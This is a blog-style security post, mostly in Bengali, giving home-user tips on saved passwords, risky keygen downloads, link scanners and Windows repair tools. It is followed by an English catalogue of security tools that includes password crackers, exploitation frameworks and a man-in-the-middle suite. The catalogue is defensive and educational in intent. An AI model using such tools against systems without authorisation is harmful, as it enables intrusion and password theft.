আর সবচেয়ে গুরুত্বপূর্ণ ওয়েবসাইট হচ্ছে  www.google.com

এটি আসলে একটি সার্চ ইঞ্জিন। যখনই কোন কিছু জানতে ইচ্ছা করবে, google-এ সার্চ করলে তুমি সেই বিষয়ের নানা তথ্যসমৃদ্ধ ওয়েবসাইটের লিংক পেয়ে যাবে।

কে হ্যাকার? কিভাবে হ্যাকার থেকে নিজে বাঁচবো?

·        অন্যান্য বেশী ব্যবহৃত ইন্টারনেট এ্যাপ্লিকেশনসিকিউরিটি: কখনই ইনষ্টেন্ট ম্যাসেঞ্জার যেমন: MSN, Yahoo, Skype ইত্যাদিতেপাসওয়ার্ড সেইভ রাখবেন না। কারন সব গুলোরই পাসওয়ার্ড রিকোভারী বা পাসওয়ার্ড ডিক্রিপ্টারপাওয়া যায়। এছাড়া যারা ওয়েব নিয়ে কাজ করে এবং সার্ভার এ বিভিন্ন ফাইল আপলোড করেন ftpclients গুলো যেমন: filezilla, smart ftp এগুলোতে পাসওয়ার্ড জমা রাখবেন না, এতে আপনারপাসওয়ার্ড চুরি হওয়ার ভয় কম থাকে।

 

·        ডাউনলোড এবং ব্রাউজিং :  সব সময়ই ভাল মানের সাইট থেকে প্রয়োজনীয়ফাইল ডাউনলোড করার চেষ্টা করবেন। তারপরও মাঝে মাঝে আমাদের বিভিন্ন ফোরাম বা ব্লগ থেকেএ্যাক্টিভেটর/কী-জেন ডাউনলোড করার প্রয়োজন হয় তা অবশ্যই স্ক্যান করে বা“Sandboxie” দিয়ে রান করুন। সাধারনত এধরনের যারা এ্যাক্টিবেটর/কীজেন তৈরী করে তারাপ্রোগ্রামিং এ মোটামুটি পারদর্শী হয়। এতে তাদের ভাইরাস কোড গুলো খুব ক্রিপ্টেট ভাবেদিয়ে থাকে এবং এন্টিভাইরাস বাইপাশ করতে সক্ষম হয়। এবার আসি আমাদের বড় ধরনের ছোটখাটভূল গুলি- “পোকার চিপস ক্রিয়েটার”, প্যাপাল মানি এ্যাডার, পিটিসি অটো মানি ডেইলি ৳20ডলার, “আমি বাংলাদেশী মেয়ে আমার সাথে কথা বলতে ডাউনলোড করুন” এগুলো সবই ভূয়া এগুলোভিতর “বট” এ্যাড করা থাকে ডাউনলোড করে রান দিলেই আপনার পিসি থেকে পাসওয়ার্ড ও প্রয়োজনীয়ফাইল চুরি হতে পারে। কোন লিংকই সিউর হওয়া ছাড়া ভিজিট করবেন না। কখনোই অপরিচিত কারোপ্রেরন করা ছবি অপেন করবেন না, নাম থাকতে পারে অনেক সুন্দর সুন্দর “Ex: FunnyGirl.jpg” কিন্তু তার ভিতরও মালওয়্যার/এ্যাডওয়ার/ট্রোজান বাইন্ড করা থাকতে পারে। সন্দেহথাকার পরও অনেক সময় প্রয়োজনীয় কোন লিংক এ ভিজিট করতে হয়, সে সময় নিচের এগুলো দিয়ে স্ক্যানকরে ভিজিট করতে পারেন:      

• URL Void

http://urlvoid.com/

• Web Inspector

http://www.webinspector.com/

• WOT

http://www.mywot.com/

যা যা চেক করবে: BlacklistChecking, Phishing, Malware Downloads, Driveby Downloads, Worms, Backdoors, Trojans,Suspicious Iframes, Heuristic Viruses, Suspicious Code, Suspicious Connections,Suspicious Activity। Comodo Web Browser এর সাথে “Web Inspector” বিল্ডইন দেয়া থাকে।স্ক্রিপ্ট ব্রাউজার রান না করাই ভালো, সবচাইতে ভালো পথ হলো আপনার যা প্রয়োজন তাই ডাউনলোডকরুন।

পিসি রিপেয়ার: আমরা যারা নতুন তারা অনেক কিছু নাবুঝে বার বার শুধু পিসি তে ভাইরাস বা সমস্যা করে ফেলি এবং বার বার ইউন্ডোজ দিতে থাকি।এতে কিন্তু আমাদের হার্ডডিষ্ক এর সমস্যা হতে পারে। নিচে প্রয়োজনীয় রিপেয়ার করার লিংকদেয়া আছে: (বিস্তারিত লিখলে অনেক বড় হয়ে যেতে পারে, যারা এক্সপার্ট তারা হয়তো বিরক্তহতে পারেন তাই সংক্ষেপে দিলাম)।

 • সিষ্টেম রিষ্টোর: অন করতেMy Commputer > Properties > System Protection > Select C: >Configure > ON.. হঠাত আমরা কাজ করার সময় যদি কোন সমস্যা দেয় বা ভাইরাস ইনফেক্টেডমনে হয় তাহলে আমরা উইন্ডোজ না দিয়ে সিষ্টেম রিষ্টোর করে তা খুব সহজে ঠিক করতে পারি।আরো জানতে: http://is.gd/u6VD1I ।

• প্রয়োজনীয় সার্ভিস: ভাইরাস ইনফেক্টেড হলে অনেক সময় প্রয়োজনীয় সার্ভিস গুলোতে এক্সেস করতে দেয়না যেমন: “Msconfig” “Task Manger” “Regedit”. যেন আমরা ষ্টার্টআপচেক করতে না পারি কি কি রান হচ্ছে ও প্রসেস যেন বন্ধ করতে না পারি। এগুলো আবার অন করতে:

• Re-Enable 2.0

http://www.softpedia.com/get/PORTABLE-SOFTWARE/System/Re-Enable-Portable.shtml

মেনুয়ালী রিপেয়ার: এ প্রসেস টা শুধু তাদের জন্য যারা ভাইরাস ও প্রয়োজনীয়সার্ভিস সম্পর্কে অবগত আছেন, এটা দিয়ে unwanted software, adware, spyware,trojans, viruses এবং worms রিমোভ করতে পারবেন। একটু কঠিন হলেও এ পদ্ধতিটা অনেক কার্যকর:

• Free Fixer

http://www.freefixer.com/download.html

উইন্ডোজ রিপেয়ার: উপরের প্রসেস গুলো করার শেষে যদি মনে হয় আপনারকোনি উইন্ডোজ সার্ভিস ঠিক মতো কাজ করছে না বা আবার পিসিতে নতুনের স্পিড আনতে চান তাহলেএটা ব্যবহার করতে পারেন।

• Windows Repair (All In One)

http://www.tweaking.com/content/page/windows_repair_all_in_one.html

[Windows 8 Repair Option: Settings> Change PC settings> General>Refresh your PC without affecting your files> Get started]

The following tools can assist you in staying safe both online and offline.
Anti-Malware
Malwarebytes’ Anti-Malware (a malware scanner for Windows)
Clam AV (a powerful AntiVirus scanner focused towards integration with mail servers for attachment scanning)
Virus Total (a web service that analyzes submitted files for known viruses and other malware)
Application-Specific Scanners
ike-scan (a command-line tool that uses the IKE protocol to discover, fingerprint and test IPsec VPN servers)
THC Amap (a tool for determining what application is listening on a given port)
NBT Scan (a program for scanning IP networks for NetBIOS name information)
Debuggers
IDA Pro (the de-facto standard for the analysis of hostile code and vulnerability research)
OllyDbg (a 32-bit assembler level analyzing debugger for Microsoft Windows)
Immunity Debugger (a debugger whose design reflects the need to write exploits, analyze malware, and reverse engineer binary files)
GDB  (it can debug programs written in Ada, C, C++, Objective-C, Pascal, and other languages)
WinDbg (a graphical debugger from Microsoft)
Encryption Tools
Open SSH (it provides secure encrypted communications between two untrusted hosts over an insecure network)
True Crypt (an open source disk encryption system for Windows, Mac, and Linux systems)
GnuPG (helps secure your data from eavesdroppers and other risks)
Open SSL (a full-strength general purpose cryptography library)
Tor (a network of virtual tunnels designed to improve privacy and security on the Internet)
Open VPN (an open-source SSL VPN package)
Kee Pass (a password manager)
Stunnel (an SSL encryption wrapper between remote client and local (inetd-startable) or remote servers)
Firewalls
Netfilter (a packet filter implemented in the standard Linux kernel)
OpenBSD PF (It handles network address translation, normalizing TCP/IP traffic, providing bandwidth control, and packet prioritization)
Forensics
Maltego (a forensics and data mining application)
Helix (an Ubuntu live CD customized for computer forensics)
The Sleuth Kit (a collection of UNIX-based command line file and volume system forensic analysis tools)
EnCase (It is made to collect data from a computer in a forensically sound manner)
Fuzzers
w3af (a popular, powerful, and flexible framework for finding and exploiting web application vulnerabilities)
skipfish (an active web application security reconnaissance tool)
General-Purpose Tools
Netcat (a feature-rich network debugging and exploration tool)
Ping/telnet/dig/traceroute/whois/netstat (they can be very handy in a pinch)
Intrusion Detection Systems
Snort (it detects thousands of worms, vulnerability exploit attempts, port scans, and other suspicious behavior)
OSSEC HIDS (it performs log analysis, integrity checking, rootkit detection, time-based alerting and active response)
OSSIM (provides a comprehensive compilation of tools with a detailed view over each and every aspect of networks, hosts, physical access devices, and servers)
Packet Crafting Tools
Hping (it is particularly useful when trying to traceroute/ping/probe hosts behind a firewall that blocks attempts using the standard utilities)
Scapy (an interactive packet manipulation tool, packet generator, network scanner, network discovery tool, and packet sniffer)
Packet Sniffers
Wireshark (an open source multi-platform network protocol analyzer)
Cain and Abel (windows-only password recovery tool handles an enormous variety of tasks)
tcpdump (used for tracking down network problems or monitoring activity)
Password Crackers
Aircrack (a suite of tools for 802.11a/b/g WEP and WPA cracking)
John the Ripper (a password cracker for UNIX/Linux and Mac OS X)
Port Scanners
Angry IP Scanner (a small open source Java application which performs host discovery (“ping scan”) and port scans)
NetScanTools (a collection of over 40 network utilities for Windows, designed with an easy user interface in mind)
Rootkit Detectors
Sysinternals (it provides many small windows utilities that are quite useful for low-level windows hacking)
Tripwire (a tool that aids system administrators and users in monitoring a designated set of files for any changes)
Security-Oriented Operating Systems
Back Track (it boasts a huge variety of Security and Forensics tools and provides a rich development environment)
Samurai Web Testing Framework (a live linux environment that has been pre-configured to function as a web pen-testing environment)
Traffic Monitoring Tools
Ettercap (a suite for man in the middle attacks on LAN)
Ntop (it shows network usage)
Vulnerability Exploitation Tools
Metasploit (it is an advanced open-source platform for developing, testing, and using exploit code)
Core Impact (it is widely considered to be the most powerful exploitation tool available)
Vulnerability Scanners
Nessus (it is one of the most popular and capable vulnerability scanners, particularly for UNIX systems)
Open VAS (it is a vulnerability scanner)
Web Browser–Related
NoScript (an add-on for Firefox that blocks JavaScript, Java, Flash, and other plugin content)
Tamper Data (an add-on for Firefox that lets you view and modify HTTP requests before they are sent)
Web Proxies
Paros Proxy (a Java-based web proxy for assessing web application vulnerability)
Fiddler (a Web Debugging Proxy which logs all HTTP(S) traffic between your computer and the Internet)
Web Vulnerability Scanners
Burp Suite (an integrated platform for attacking web applications)
Nikto (an Open Source (GPL) web server scanner which performs comprehensive tests against web servers for multiple items)
Wireless Tools
Kismet (a console (ncurses) based 802.11 layer-2 wireless network detector, sniffer, and intrusion detection system)
Netstumbler (the best known Windows tool for finding open wireless access points (“wardriving”))
http://www.stumbler.net/

Source: Google.com